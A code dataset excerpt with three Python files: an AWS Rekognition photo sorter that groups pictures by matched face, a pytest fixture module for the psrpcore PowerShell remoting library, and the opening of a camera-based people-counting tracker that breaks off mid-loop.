source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
facelook_photo_management.py
|
##Main program
## Before running this program, you need to have functional aws cli and boto3 installed.
##^^^^^^
##Author: AI_Papa (matthew.tsoi@gmail.com)
##Import AWS client modules
import boto3
from botocore.exceptions import ClientError
##Import modules for multi-thread and general OS utilities
import logging,time, io, os, shutil
from threading import Thread
from argparse import ArgumentParser
##Import mode for image processing, **Need additional PIP install
from PIL import Image#, ImageDraw, ExifTags, ImageColor
def init_logger():
# set up logging to file - see previous section for more details
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filename='facelook_photo_management.log',
filemode='w')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
logging.info('Logger started!')
def createCollection(collectionId=''):
logging.info('Creating face index collection ['+collectionId+']')
# Replace collectionID with the name of the collection that you want to create.
#maxResults = 2
client=boto3.client('rekognition')
response = client.create_collection(CollectionId=collectionId)
logging.info('Collection ARN: ' + response['CollectionArn'])
logging.info('Status code: ' + str(response['StatusCode']))
if response['StatusCode']==200:
logging.info('Collection created successfully!')
return response['CollectionArn']
else:
return 0
def removeCollection(collectionId=''):
logging.info('Attempting to delete collection ' + collectionId)
client=boto3.client('rekognition')
statusCode=''
try:
response=client.delete_collection(CollectionId=collectionId)
statusCode=response['StatusCode']
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
logging.info ('The collection ' + collectionId + ' was not found ')
else:
logging.error ('Error other than Not Found occurred: ' + e.response['Error']['Message'])
statusCode=e.response['ResponseMetadata']['HTTPStatusCode']
logging.info('Operation returned Status Code: ' + str(statusCode))
def addFaces(filename='',collectionId=''):
faceIds = []
tic=time.time()
logging.info('['+filename+'] Reading image file: '+filename)
image = Image.open(open(filename,'rb'))
stream = io.BytesIO()
image.save(stream, format=image.format)
image_binary = stream.getvalue()
client=boto3.client('rekognition')
response=client.index_faces(CollectionId=collectionId,
#Image={'S3Object':{'Bucket':bucket,'Name':photo}},
Image={'Bytes': image_binary},
ExternalImageId=os.path.splitext(os.path.basename(filename))[0],
MaxFaces=1,
QualityFilter="AUTO",
DetectionAttributes=['ALL'])
toc = time.time()
logging.info ('['+filename+'] Add face completed. Processing time: '+str(round((toc-tic),2))+' sec.')
logging.debug ('['+filename+'] Faces indexed:')
for faceRecord in response['FaceRecords']:
logging.info('['+filename+'] Face signature: ' + faceRecord['Face']['FaceId'])
logging.info('['+filename+'] Face ID: ' + faceRecord['Face']['ExternalImageId'])
logging.info('['+filename+'] Confidence: {}'.format(faceRecord['Face']['Confidence']))
logging.debug('['+filename+'] Location: {}'.format(faceRecord['Face']['BoundingBox']))
faceIds.append([faceRecord['Face']['ExternalImageId'],faceRecord['Face']['FaceId']])
return faceIds
#print('Faces not indexed:')
#for unindexedFace in response['UnindexedFaces']:
# print(' Location: {}'.format(unindexedFace['FaceDetail']['BoundingBox']))
# print(' Reasons:')
# for reason in unindexedFace['Reasons']:
# print(' ' + reason)
def detectFaces(img='',debug=False):
#Get a list of face IDs from an image
faces=[]
photo= img
# Open image and get image data from stream.
image = Image.open(open(photo,'rb'))
stream = io.BytesIO()
image.save(stream, format=image.format)
image_binary = stream.getvalue()
client = boto3.client('rekognition')
tic = time.time()
response = client.detect_faces(Image={'Bytes': image_binary},Attributes=['ALL'])
toc = time.time()
logging.info('['+img+'] Face detection completed. '+str(len(response['FaceDetails']))+' faces detected in '+str(round(toc-tic,4))+'sec.')
for faceDetail in response['FaceDetails']:
#print('The detected face is between ' +
# str(faceDetail['AgeRange']['Low']) +
# ' and ' + str(faceDetail['AgeRange']['High']) +
# ' years old')
#print('The gender of detected face is'+str(faceDetail['Gender']))
box = faceDetail['BoundingBox']
#print(box)
imgWidth, imgHeight = image.size
left = imgWidth * box['Left']
top = imgHeight * box['Top']
width = imgWidth * box['Width']
height = imgHeight * box['Height']
face=image.crop((left,top,left+width,top+height))
faces.append(face)
#ImageDraw.Draw(face)
if debug:
face.show()
if debug:
image.show()
return faces
def matchFace(collectionId='',face='',input_folder='',path_sep='',img_file='',output_folder='',threshold=70,debug=False):
stream = io.BytesIO()
face.save(stream, format='PNG')
image_binary = stream.getvalue()
client = boto3.client('rekognition')
try:
response = client.search_faces_by_image(CollectionId=collectionId,FaceMatchThreshold=threshold,Image={'Bytes': image_binary},MaxFaces=123)
except:
if debug:
face.show()
return
if debug:
print (response['FaceMatches'])
face.show()
if response['FaceMatches']:
#face.show()
logging.info('['+img_file+'] Matched person ['+response['FaceMatches'][0]['Face']['ExternalImageId']+'] with similarity '+str(round(response['FaceMatches'][0]['Similarity'],2))+'%')
matched_person = response['FaceMatches'][0]['Face']['ExternalImageId']
##creaete person folder if it does not exists yet
if os.path.exists(output_folder+path_sep+matched_person):
pass
else:
os.mkdir(output_folder+path_sep+matched_person)
shutil.copyfile(input_folder+path_sep+img_file,output_folder+path_sep+matched_person+path_sep+img_file)
def matchFaces(collectionId='',input_folder='',path_sep="\\",img_file='',output_folder='',threshold=70,debug=False):
##Match detected faces with existing collection
tic = time.time()
##Get a list of faces from photo
faces=detectFaces(input_folder+path_sep+img_file,debug=debug)
threads=[]
#client = boto3.client('rekognition')
for face in faces:
t=Thread(target=matchFace,args=(collectionId,face,input_folder,path_sep,img_file,output_folder,threshold,debug))
t.start()
threads.append(t)
for t in threads:
t.join(180)
toc = time.time()
#logging.info('['+img_file+'] Face matched completed and found ['+str(len(matched_faces))+'] faces in '+str(round(toc-tic,4))+'sec.')
logging.info('['+img_file+'] Face matched completed in '+str(round(toc-tic,4))+'sec.')
# return matched_faces
def isWindows():
if os.name=='nt':
return True
else:
return False
##Main routine
if __name__ == "__main__":
overall_tic=time.time()
##input arguements defaults
#input_folder='./in_photo/'
#input_face_folder = './in_face/'
#output_folder='./out_photo'
#threshold=70
#Parse input arguements
parser = ArgumentParser(prog="facelook",description="Using AWS Rekcognition service to sort photo by invidial matched face (person)",usage="Use face recongnition to management photos")
##Configure input arguements
parser.add_argument("--input_folder", default='./in_photo/', type=str, help="Folder path for photos to be process.")
parser.add_argument("--input_face_folder", default='./in_face/', type=str, help="Folder path face photo. Filename will be used as face reference ID")
parser.add_argument("--output_folder", default='./out_photo/', type=str, help="Output folder")
parser.add_argument("--threshold", default=85, type=int, help="Threshold face similarity match")
args = parser.parse_args()
if args.input_folder is not None:
input_folder=args.input_folder
if args.input_face_folder is not None:
input_face_folder=args.input_face_folder
if args.output_folder is not None:
output_folder=args.output_folder
if args.threshold is not None:
threshold=args.threshold
##determine OS platform to define path separator
if isWindows():
path_sep='\\'
else:
path_sep='/'
##init logger
init_logger()
try:
removeCollection('faceCollection')
except:
logging.warning('Collection does not exists!')
##Create a face index collection
createCollection('faceCollection')
##Add face index into collection from face index folder
#logging.info(addFaces('./in_face/donald.jpg','faceCollection'))
directory = os.fsencode(input_face_folder)
threads=[]
tic=time.time()
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith(".jpeg") or filename.endswith(".jpg"):
#addFaces(input_face_folder+path_sep+filename,'faceCollection')
t=Thread(target=addFaces,args=(input_face_folder+path_sep+filename,'faceCollection'))
t.start()
threads.append(t)
logging.info(str(len(threads))+' threads started for face index processing.')
##Wait for all face index threads completed
for t in threads:
t.join(180)
toc=time.time()
logging.info('All faces added to collect in '+str(round(toc-tic,4))+'sec.')
#time.sleep(3)
##Now detect faces from photo collection and put them into identified person folder(s)
directory = os.fsencode(input_folder)
threads=[]
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith(".jpeg") or filename.endswith(".jpg"):
#matchFaces('faceCollection',input_folder,path_sep,filename,output_folder)
t=Thread(target=matchFaces,args=('faceCollection',input_folder,path_sep,filename,output_folder,threshold))
t.start()
threads.append(t)
for t in threads:
t.join(60)
overall_toc=time.time()
logging.info('Process completed in '+str(round(overall_toc-overall_tic,2))+' sec.')
##Remove the face collection
#removeCollection('faceCollection')
|
conftest.py
|
# -*- coding: utf-8 -*-
# Copyright: (c) 2021, Jordan Borean (@jborean93) <jborean93@gmail.com>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)
import base64
import collections
import contextlib
import os
import queue
import socket
import subprocess
import threading
import typing
import uuid
from xml.etree import ElementTree
import pytest
from xmldiff import main as _xmldiff
if os.name == "nt":
import win32api
import win32event
import win32file
import win32pipe
import winerror
import psrpcore
BUFFER_SIZE = 327681
# Contains control characters, non-ascii chars, and chars that are surrogate pairs in UTF-16
COMPLEX_STRING = "treble clef\n _x0000_ _X0000_ %s café" % b"\xF0\x9D\x84\x9E".decode("utf-8")
COMPLEX_ENCODED_STRING = "treble clef_x000A_ _x005F_x0000_ _x005F_X0000_ _xD834__xDD1E_ café"
T = typing.TypeVar("T", psrpcore.ClientRunspacePool, psrpcore.ServerRunspacePool)
OutOfProcPacket = collections.namedtuple("OutOfProcPacket", ["action", "ps_guid", "data"])
def which(program: str) -> typing.Optional[str]:
for path in os.environ.get("PATH", "").split(os.pathsep):
exe = os.path.join(path, program)
if os.path.isfile(exe) and os.access(exe, os.X_OK):
return exe
return
PWSH_PATH = which("pwsh.exe" if os.name == "nt" else "pwsh")
class FakeCryptoProvider(psrpcore.types.PSCryptoProvider):
def decrypt(self, value: bytes) -> bytes:
return value
def encrypt(self, value: bytes) -> bytes:
return value
def register_key(self, key: bytes) -> None:
pass
class OutOfProcTransport(typing.Generic[T]):
def __init__(self, runspace: T) -> None:
self.runspace = runspace
self._incoming: queue.Queue[typing.Union[Exception, OutOfProcPacket]] = queue.Queue()
self._listen_task = threading.Thread(target=self._read_task)
self._wait = threading.Condition()
self._wait_set = set()
def __enter__(self) -> "OutOfProcTransport":
self._open()
self._listen_task.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
self._close()
self._listen_task.join()
def next_payload(self) -> OutOfProcPacket:
# No long running tests, anything taking more than 60 seconds is a failure
payload = self._incoming.get(timeout=60)
if isinstance(payload, Exception):
raise payload
return payload
def next_event(self) -> psrpcore.PSRPEvent:
while True:
event = self.runspace.next_event()
if event:
return event
payload = self.next_payload()
if payload.action != "Data":
continue
self.runspace.receive_data(payload.data)
def close(
self,
pipeline_id: typing.Optional[uuid.UUID] = None,
) -> None:
with self._wait_ack("Close", pipeline_id):
self._send(ps_guid_packet("Close", pipeline_id))
def close_ack(
self,
pipeline_id: typing.Optional[uuid.UUID] = None,
) -> None:
self._send(ps_guid_packet("CloseAck", pipeline_id))
def command(
self,
pipeline_id: typing.Optional[uuid.UUID] = None,
) -> None:
with self._wait_ack("Command", pipeline_id):
self._send(ps_guid_packet("Command", pipeline_id))
def command_ack(
self,
pipeline_id: typing.Optional[uuid.UUID] = None,
) -> None:
self._send(ps_guid_packet("CommandAck", pipeline_id))
def data(
self,
wait_ack: bool = True,
) -> bool:
data = self.runspace.data_to_send()
if not data:
return False
with self._wait_ack("Data" if wait_ack else None, data.pipeline_id):
self._send(ps_data_packet(*data))
return True
def data_ack(
self,
pipeline_id: typing.Optional[uuid.UUID] = None,
) -> None:
self._send(ps_guid_packet("DataAck", pipeline_id))
def signal(
self,
pipeline_id: typing.Optional[uuid.UUID] = None,
) -> None:
with self._wait_ack("Signal", pipeline_id):
self._send(ps_guid_packet("Signal", pipeline_id))
def signal_ack(
self,
pipeline_id: typing.Optional[uuid.UUID] = None,
) -> None:
self._send(ps_guid_packet("SignalAck", pipeline_id))
def _read_task(self):
try:
self._read()
except Exception as e:
self._incoming.put(e)
finally:
with self._wait:
for key in list(self._wait_set):
self._wait_set.remove(key)
self._wait.notify_all()
def _read(self) -> None:
buffer = bytearray()
while True:
try:
end_idx = buffer.index(b"\n")
except ValueError:
# Don't have enough data - wait for more to arrive.
read_data = self._recv()
if not read_data:
break
buffer += read_data
continue
raw_element = bytes(buffer[:end_idx])
buffer = buffer[end_idx + 1 :]
element = ElementTree.fromstring(raw_element)
ps_guid = uuid.UUID(element.attrib["PSGuid"].upper())
if ps_guid == uuid.UUID(int=0):
ps_guid = None
if element.tag == "Data":
psrp_data = base64.b64decode(element.text) if element.text else b""
stream_type = (
psrpcore.StreamType.prompt_response
if element.attrib.get("Stream", "") == "PromptResponse"
else psrpcore.StreamType.default
)
payload = psrpcore.PSRPPayload(psrp_data, stream_type, ps_guid)
self._incoming.put(OutOfProcPacket("Data", ps_guid, payload))
elif element.tag.endswith("Ack"):
pipeline = str(ps_guid) if ps_guid else ""
with self._wait:
self._wait_set.remove(f"{element.tag}:{pipeline.upper()}")
self._wait.notify_all()
else:
self._incoming.put(OutOfProcPacket(element.tag, ps_guid, None))
def _open(self) -> None:
raise NotImplementedError()
def _close(self) -> None:
raise NotImplementedError()
def _recv(self) -> typing.Optional[bytes]:
raise NotImplementedError()
def _send(self, data: bytes) -> None:
raise NotImplementedError()
@contextlib.contextmanager
def _wait_ack(
self,
action: typing.Optional[str],
pipeline_id: typing.Optional[uuid.UUID] = None,
):
if not action:
yield
return
pipeline = str(pipeline_id) if pipeline_id else ""
key = f"{action}Ack:{pipeline.upper()}"
with self._wait:
self._wait_set.add(key)
yield
self._wait.wait_for(lambda: key not in self._wait_set)
class ClientTransport(OutOfProcTransport[psrpcore.ClientRunspacePool]):
def __init__(self, runspace: psrpcore.ClientRunspacePool, executable: str) -> None:
super().__init__(runspace)
self._executable = executable
self._process = None
def _open(self) -> None:
pipe = subprocess.PIPE
self._process = subprocess.Popen([self._executable, "-NoLogo", "-s"], stdin=pipe, stdout=pipe, stderr=pipe)
def _close(self) -> None:
if self._process.poll() is None:
self._process.kill()
self._process.wait()
def _recv(self) -> typing.Optional[bytes]:
stdout = self._process.stdout.readline()
if not stdout:
stdout, stderr = self._process.communicate()
if stderr:
raise Exception(stderr.decode())
return stdout
def _send(self, data: bytes) -> None:
self._process.stdin.write(data)
self._process.stdin.flush()
class ServerTransport(OutOfProcTransport[psrpcore.ServerRunspacePool]):
def __init__(self, runspace: psrpcore.ServerRunspacePool, pipe_name: str) -> None:
super().__init__(runspace)
self.pipe_name = pipe_name
def data(
self,
wait_ack: bool = False,
) -> bool:
return super().data(wait_ack=wait_ack)
class UnixDomainSocket(ServerTransport):
def __init__(self, runspace: psrpcore.ServerRunspacePool, pipe_name: str) -> None:
super().__init__(runspace, pipe_name)
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self._conn: typing.Optional[socket.socket] = None
self._sock_lock = threading.Lock()
def _open(self) -> None:
self._sock.bind(self.pipe_name)
self._sock.listen(1)
def _close(self) -> None:
if self._conn:
self._conn.shutdown(socket.SHUT_RDWR)
self._conn.close()
self._conn = None
self._sock.shutdown(socket.SHUT_RDWR)
self._sock.close()
def _recv(self) -> typing.Optional[bytes]:
return self._get_sock().recv(BUFFER_SIZE)
def _send(self, data: bytes) -> None:
self._get_sock().sendall(data)
def _get_sock(self) -> socket.socket:
with self._sock_lock:
if not self._conn:
self._conn = self._sock.accept()[0]
return self._conn
class NamedPipe(ServerTransport):
def __init__(self, runspace: psrpcore.ServerRunspacePool, pipe_name: str) -> None:
super().__init__(runspace, pipe_name)
self._pipe = win32pipe.CreateNamedPipe(
"\\\\.\\pipe\\" + pipe_name,
win32pipe.PIPE_ACCESS_DUPLEX | win32file.FILE_FLAG_OVERLAPPED,
win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_READMODE_MESSAGE | win32pipe.PIPE_WAIT,
1,
BUFFER_SIZE,
BUFFER_SIZE,
0,
None,
)
self._connected = False
self._end_event = win32event.CreateEvent(None, True, 0, None)
self._write_requested = win32event.CreateEvent(None, True, 0, None)
self._pipe_lock = threading.Lock()
self._write_lock = threading.Lock()
def _open(self) -> None:
pass
def _close(self) -> None:
win32event.SetEvent(self._end_event)
with self._pipe_lock:
if self._connected:
win32pipe.DisconnectNamedPipe(self._pipe)
self._connected = False
if self._pipe:
win32file.CloseHandle(self._pipe)
self._pipe = None
def _recv(self) -> typing.Optional[bytes]:
buffer = win32file.AllocateReadBuffer(BUFFER_SIZE)
overlapped = win32file.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, True, 0, None)
while True:
with self._write_lock:
pass
with self._pipe_lock:
self._connect()
res = win32file.ReadFile(self._pipe, buffer, overlapped)[0]
if res == winerror.ERROR_SUCCESS:
bytes_read = win32file.GetOverlappedResult(self._pipe, overlapped, True)
return bytes(buffer[:bytes_read])
elif res != winerror.ERROR_IO_PENDING:
msg = win32api.FormatMessage(res)
raise Exception(f"Named pipe read failed 0x{res:08X} - {msg}")
wait_idx = win32event.WaitForMultipleObjects(
(overlapped.hEvent, self._end_event, self._write_requested),
False,
win32event.INFINITE,
)
if wait_idx != win32event.WAIT_OBJECT_0:
win32file.CancelIo(self._pipe)
try:
bytes_read = win32file.GetOverlappedResult(self._pipe, overlapped, True)
except win32file.error as err:
if err.winerror != winerror.ERROR_OPERATION_ABORTED:
raise
bytes_read = 0
if bytes_read:
data = bytes(buffer[:bytes_read])
return data
elif wait_idx == win32event.WAIT_OBJECT_0 + 1:
return
def _send(self, data: bytes) -> None:
with self._write_lock:
win32event.SetEvent(self._write_requested)
with self._pipe_lock:
buffer = bytearray(data)
offset = 0
self._connect()
while offset < len(data):
res, bytes_written = win32file.WriteFile(self._pipe, buffer[offset:])
if res != winerror.ERROR_SUCCESS:
msg = win32api.FormatMessage(res)
raise Exception(f"Named pipe write failed 0x{res:08X} - {msg}")
offset += bytes_written
win32file.FlushFileBuffers(self._pipe)
win32event.ResetEvent(self._write_requested)
def _connect(self):
if not self._connected:
overlapped = win32file.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, True, 0, None)
res = win32pipe.ConnectNamedPipe(self._pipe, overlapped)
if res == winerror.ERROR_IO_PENDING:
wait_idx = win32event.WaitForMultipleObjects(
(overlapped.hEvent, self._end_event),
False,
win32event.INFINITE,
)
if wait_idx != win32event.WAIT_OBJECT_0:
raise Exception("Failed while waiting for client connection")
elif res != winerror.ERROR_SUCCESS:
msg = win32api.FormatMessage(res)
raise Exception(f"Named pipe connect failed 0x{res:08X} - {msg}")
self._connected = True
def get_runspace_pair(
min_runspaces: int = 1, max_runspaces: int = 1
) -> typing.Tuple[psrpcore.ClientRunspacePool, psrpcore.ServerRunspacePool]:
client = psrpcore.ClientRunspacePool(min_runspaces=min_runspaces, max_runspaces=max_runspaces)
server = psrpcore.ServerRunspacePool()
client.open()
server.receive_data(client.data_to_send())
server.next_event()
server.next_event()
client.receive_data(server.data_to_send())
client.next_event()
client.next_event()
client.next_event()
return client, server
def assert_xml_diff(actual: str, expected: str):
# We don't care that the XML text is the exact same but rather if they represent the same object. Python versions
# vary on how they order attributes of an element whereas xmldiff doesn't care.
diff = _xmldiff.diff_texts(actual, expected)
if len(diff) != 0:
# The assertion for diff_texts isn't pretty and it's easier to see what the diff is by comparing the text.
assert actual == expected
def serialize(value: typing.Any, **kwargs: typing.Any) -> ElementTree.Element:
return psrpcore.types.serialize(value, FakeCryptoProvider(), **kwargs)
def deserialize(value: ElementTree.Element, **kwargs: typing.Any):
return psrpcore.types.deserialize(value, FakeCryptoProvider(), **kwargs)
def ps_data_packet(
data: bytes,
stream_type: psrpcore.StreamType = psrpcore.StreamType.default,
ps_guid: typing.Optional[uuid.UUID] = None,
) -> bytes:
"""Data packet for PSRP fragments.
This creates a data packet that is used to encode PSRP fragments when
sending to the server.
Args:
data: The PSRP fragments to encode.
stream_type: The stream type to target, Default or PromptResponse.
ps_guid: Set to `None` or a 0'd UUID to target the RunspacePool,
otherwise this should be the pipeline UUID.
Returns:
bytes: The encoded data XML packet.
"""
ps_guid = ps_guid or uuid.UUID(int=0)
stream_name = b"Default" if stream_type == psrpcore.StreamType.default else b"PromptResponse"
return b"<Data Stream='%s' PSGuid='%s'>%s</Data>\n" % (
stream_name,
str(ps_guid).lower().encode(),
base64.b64encode(data),
)
def ps_guid_packet(
element: str,
ps_guid: typing.Optional[uuid.UUID] = None,
) -> bytes:
"""Common PSGuid packet for PSRP message.
This creates a PSGuid packet that is used to signal events and stages in
the PSRP exchange. Unlike the data packet this does not contain any PSRP
fragments.
Args:
element: The element type, can be DataAck, Command, CommandAck, Close,
CloseAck, Signal, and SignalAck.
ps_guid: Set to `None` or a 0'd UUID to target the RunspacePool,
otherwise this should be the pipeline UUID.
Returns:
bytes: The encoded PSGuid packet.
"""
ps_guid = ps_guid or uuid.UUID(int=0)
return b"<%s PSGuid='%s' />\n" % (element.encode(), str(ps_guid).lower().encode())
def run_pipeline(
client_pwsh: ClientTransport,
script: str,
host: typing.Optional[psrpcore.types.HostInfo] = None,
) -> typing.List[psrpcore.PSRPEvent]:
ps = psrpcore.ClientPowerShell(client_pwsh.runspace, host=host)
ps.add_script(script)
ps.start()
client_pwsh.command(ps.pipeline_id)
client_pwsh.data()
events = []
while ps.state == psrpcore.types.PSInvocationState.Running:
events.append(client_pwsh.next_event())
ps.close()
client_pwsh.close(ps.pipeline_id)
return events
@pytest.fixture(scope="function")
def client_pwsh():
"""Creates an unopened Runspace Pool against a pwsh process."""
if not PWSH_PATH:
pytest.skip("Integration test requires pwsh")
runspace = psrpcore.ClientRunspacePool()
with ClientTransport(runspace, PWSH_PATH) as conn:
yield conn
@pytest.fixture(scope="function")
def client_opened_pwsh():
"""Creates an Opened Runspace Pool against a pwsh process."""
if not PWSH_PATH:
pytest.skip("Integration test requires pwsh")
host = psrpcore.types.HostInfo(
IsHostNull=False,
IsHostUINull=False,
IsHostRawUINull=False,
UseRunspaceHost=False,
HostDefaultData=psrpcore.types.HostDefaultData(
ForegroundColor=psrpcore.types.ConsoleColor.Blue,
BackgroundColor=psrpcore.types.ConsoleColor.Red,
CursorPosition=psrpcore.types.Coordinates(X=10, Y=20),
WindowPosition=psrpcore.types.Coordinates(X=30, Y=40),
CursorSize=5,
BufferSize=psrpcore.types.Size(Width=60, Height=120),
WindowSize=psrpcore.types.Size(Width=60, Height=120),
MaxWindowSize=psrpcore.types.Size(Width=60, Height=120),
MaxPhysicalWindowSize=psrpcore.types.Size(Width=60, Height=120),
WindowTitle="My Window",
),
)
runspace = psrpcore.ClientRunspacePool(host=host)
with ClientTransport(runspace, PWSH_PATH) as pwsh:
pwsh.runspace.open()
pwsh.data()
while pwsh.runspace.state == psrpcore.types.RunspacePoolState.Opening:
pwsh.next_event()
yield pwsh
@pytest.fixture(scope="function")
def server_pwsh(tmp_path):
"""Creates a pipe PSRP server that can be called in pwsh."""
if not PWSH_PATH:
pytest.skip("Integration test requires pwsh")
pipe_name = f"psrpcore-{str(uuid.uuid4()).upper()}"
runspace = psrpcore.ServerRunspacePool()
try:
if os.name == "nt":
transport = NamedPipe(runspace, pipe_name)
else:
pipe_name = str(tmp_path / pipe_name)
transport = UnixDomainSocket(runspace, pipe_name)
with transport:
yield transport
finally:
if os.name != "nt":
try:
os.unlink(pipe_name)
except FileNotFoundError:
pass
|
run_thread.py
|
from mylib.centroidtracker import CentroidTracker
from mylib.trackableobject import TrackableObject
from imutils.video import VideoStream
from imutils.video import FPS
#from imutils import resize
from mylib.mailer import Mailer
from mylib import config
from mylib.config import x1,y1,x2,y2,vertical_direction,enter_direction,cam_place
import time, schedule
import numpy as np
import argparse, imutils
import time, dlib, cv2, datetime
#from itertools import zip_longest
from Lineiterator import createLineIterator
from limitexceed import check_exceed
from get_requests import send_req
from os.path import exists
from excel_data_converter import create_summary, data_converter
import queue
import os,sys
from multiprocessing import Queue, Process
t0 = time.time()
class variable:
def __init__(self):
self.ct = CentroidTracker(maxDisappeared=40, maxDistance=50)
self.trackers=[]
self.trackableObjects={}
self.totalFrames=0
self.x=[]
self.totalDown=0
self.totalUp=0
self.empty=[]
self.empty1=[]
self.cap=cv2.VideoCapture(config.url)
self.H = None
self.W= None
self.fivemin= datetime.datetime.now()+datetime.timedelta(0,300)
self.writer = None
self.do_malier = 1
tmr=datetime.datetime.now()
try:
#tmr=tmr.replace(day=tmr.day + 1, hour=21, minute=12, second=0, microsecond=0)
tmr=tmr.replace(day=tmr.day + 1, hour=0, minute=0, second=0, microsecond=0)
except ValueError:
try:
tmr=tmr.replace(month=tmr.month + 1, day= 1,hour=0, minute=0, second=0, microsecond=0)
except ValueError:
tmr=tmr.replace(year= tmr.year + 1 ,month= 1, day= 1,hour=0, minute=0, second=0, microsecond=0)
self.tmr =tmr
var=variable()
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--prototxt", required=False, default = 'mobilenet_ssd/MobileNetSSD_deploy.prototxt',
help="path to Caffe 'deploy' prototxt file")
ap.add_argument("-m", "--model", required=False,default = 'mobilenet_ssd/MobileNetSSD_deploy.caffemodel',
help="path to Caffe pre-trained model")
ap.add_argument("-i", "--input", type=str,
help="path to optional input video file")
ap.add_argument("-cam", "--camera", required=True,type=str,
help="summary camera name")
ap.add_argument("-o", "--output", type=str,
help="path to optional output video file")
# confidence default 0.4
ap.add_argument("-c", "--confidence", type=float, default=0.4,
help="minimum probability to filter weak detections")
ap.add_argument("-s", "--skip-frames", type=int, default=30,
help="# of skip frames between detections")
args = vars(ap.parse_args())
# initialize the list of class labels MobileNet SSD was trained to
# detect
CLASSES = ["background", "aeroplane", "bicycle", "bird", "boat",
"bottle", "bus", "car", "cat", "chair", "cow", "diningtable",
"dog", "horse", "motorbike", "person", "pottedplant", "sheep",
"sofa", "train", "tvmonitor"]
# load our serialized model from disk
net = cv2.dnn.readNetFromCaffe(args["prototxt"], args["model"])
# if a video path was not supplied, grab a reference to the ip camera
if not args.get("input", False):
print("[INFO] Starting the live stream..")
vs = VideoStream(src=config.url).start()
#time.sleep(2.0)
# otherwise, grab a reference to the video file
else:
print("[INFO] Starting the video..")
vs = cv2.VideoCapture(args["input"])
# initialize the video writer (we'll instantiate later if need be)
writer = None
# initialize the frame dimensions (we'll set them as soon as we read
# the first frame from the video)
W = None
H = None
if config.five_mins == True:
now=datetime.datetime.now()
fivemin= now+datetime.timedelta(0,300)
if config.people_change == True:
peoplechangelist= []
###################################
try:
m = ((-1*y2)-y1)/((x2)-x1)
except:
m = 1000000001
print(m)
# m = (y2-y1)/(x2-x1)
# 0,0 -w // 2, -hi
#print(m)
iterlist=createLineIterator(np.array([int(round(x1)), int(round(y1))]),np.array([int(round(x2)), int(round(y2))]))
# instantiate our centroid tracker, then initialize a list to store
# each of our dlib correlation trackers, followed by a dictionary to
# map each unique object ID to a TrackableObject
################
#q = queue.Queue()
# start the frames per second throughput estimator
fps = FPS().start()
#if config.Thread:
# vs = thread.ThreadingClass(config.url)
def capture(q):
while True:
ret, frame = var.cap.read() # read the frames and ---
if not ret:
break
if not q.empty():
try:
q.get_nowait()
except queue.Empty:
pass
q.put(frame)
#frame = vs.read()
def tracker_peo(q):
while True:
frame = q.get()
frame = frame[1] if args.get("input", False) else frame
# if we are viewing a video and we did not grab a frame then we
# have reached the end of the video
if args["input"] is not None and frame is None:
break
# resize the frame to have a maximum width of 500 pixels (the
# less data we have, the faster we can process it), then convert
# the frame from BGR to RGB for dlib
try:
frame = imutils.resize(frame, width = 500)
except AttributeError:
print(frame)
raise AttributeError
rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# if the frame dimensions are empty, set them
try:
if var.W is None or var.H is None:
(var.H, var.W) = frame.shape[:2]
print(f"Frame height is : {var.H}, frame width is : {var.W}")
except AttributeError:
print('(H, W) = frame.shape[:2] error')
raise AttributeError
# if we are supposed to be writing a video to disk, initialize
# the writer
if args["output"] is not None and writer is None:
fourcc = cv2.VideoWriter_fourcc(*"mp4v")
writer = cv2.VideoWriter(args["output"], fourcc, 30,
(var.W, var.H), True)
# initialize the current status along with our list of bounding
# box rectangles returned by either (1) our object detector or
# (2) the correlation trackers
status = "Waiting"
rects = []
if config.five_mins == True:
if datetime.datetime.now() >= var.fivemin:
enterp=info[1][1]
exitp=info[0][1]
send_req(enterp,exitp)
now = datetime.datetime.now()
var.fivemin = now + datetime.timedelta(0,300)
if config.people_change == True:
if len(peoplechangelist) >= 2:
if peoplechangelist[-1] != peoplechangelist[-2]:
enterp=info[1][1]
exitp=info[0][1]
print(peoplechangelist)
send_req(enterp,exitp)
if len(peoplechangelist) > 2:
del peoplechangelist[:-2]
# loop over frames from the video stream
# grab the next frame and handle if we are reading from either
# VideoCapture or VideoStream
# check to see if we should run a more computationally expensive
# object detection method to aid our tracker
if var.totalFrames % args["skip_frames"] == 0:
# set the status and initialize our new set of object trackers
status = "Detecting"
var.trackers = []
# convert the frame to a blob and pass the blob through the
# network and obtain the detections
blob = cv2.dnn.blobFromImage(frame, 0.007843, (var.W, var.H), 127.5)
net.setInput(blob)
detections = net.forward()
# loop over the detections
for i in np.arange(0, detections.shape[2]):
# extract the confidence (i.e., probability) associated
# with the prediction
confidence = detections[0, 0, i, 2]
# filter out weak detections by requiring a minimum
# confidence
if confidence > args["confidence"]:
# extract the index of the class label from the
# detections list
idx = int(detections[0, 0, i, 1])
# if the class label is not a person, ignore it
if CLASSES[idx] != "person":
continue
# compute the (x, y)-coordinates of the bounding box
# for the object
box = detections[0, 0, i, 3:7] * np.array([var.W, var.H, var.W, var.H])
(startX, startY, endX, endY) = box.astype("int")
# construct a dlib rectangle object from the bounding
# box coordinates and then start the dlib correlation
# tracker
tracker = dlib.correlation_tracker()
rect = dlib.rectangle(startX, startY, endX, endY)
tracker.start_track(rgb, rect)
# add the tracker to our list of trackers so we can
# utilize it during skip frames
var.trackers.append(tracker)
# otherwise, we should utilize our object *trackers* rather than
# object *detectors* to obtain a higher frame processing throughput
